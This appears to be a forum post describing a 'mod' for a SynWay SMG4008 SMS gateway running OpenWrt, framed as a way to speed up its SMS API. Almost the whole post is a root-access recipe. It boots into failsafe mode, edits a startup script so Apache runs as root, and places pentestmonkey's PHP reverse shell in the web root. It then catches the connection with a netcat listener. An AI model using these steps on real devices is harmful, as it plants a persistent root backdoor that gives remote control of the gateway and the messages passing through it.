Hi, this mod will show you how to improve the API from 8 secs/sms to 2 secs/sms on the SMG4008 SynWay (Linux OpenWrt Backfire 10.03.1)
First, connect through console and reboot the device
Wait until boot message request "press [f] and [enter]", and press those keys to enter failsafe mode.
Locate the "/init" file, and watch the flash device
# cat /init | grep flash
mkdir -p /mnt/flash
mount -t yaffs2 /dev/mtdblock3 /mnt/flash
so, execute them to mount it manually.
edit the file /mnt/flash/init/S900usrcustom.sh and add:
sed -i 's/User daemon/User root/g' /usr/local/apache/conf/httpd.conf
sed -i 's/Group daemon/Group root/g' /usr/local/apache/conf/httpd.conf
cp /mnt/flash/php-reverse-shell.php /usr/local/apache/htdocs/
get the file: http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz, extract it,
edit the file and set your ip/port where the smsgateway will connect to (read http://pentestmonkey.net/tools/web-shells/php-reverse-shell)
and put in /mnt/flash/php-reverse-shell.php
reboot the device or wait until it reboots by itself
final step:
in your client box execute netcat where 1234 is the port you define in /mnt/flash/php-reverse-shell.php:
# nc -l 1234
In your browser execute:
http://sms_gateway_ip/php-reverse-shell.php and in your client box, you have root access!
So you can start improve the API.
I'm working with that
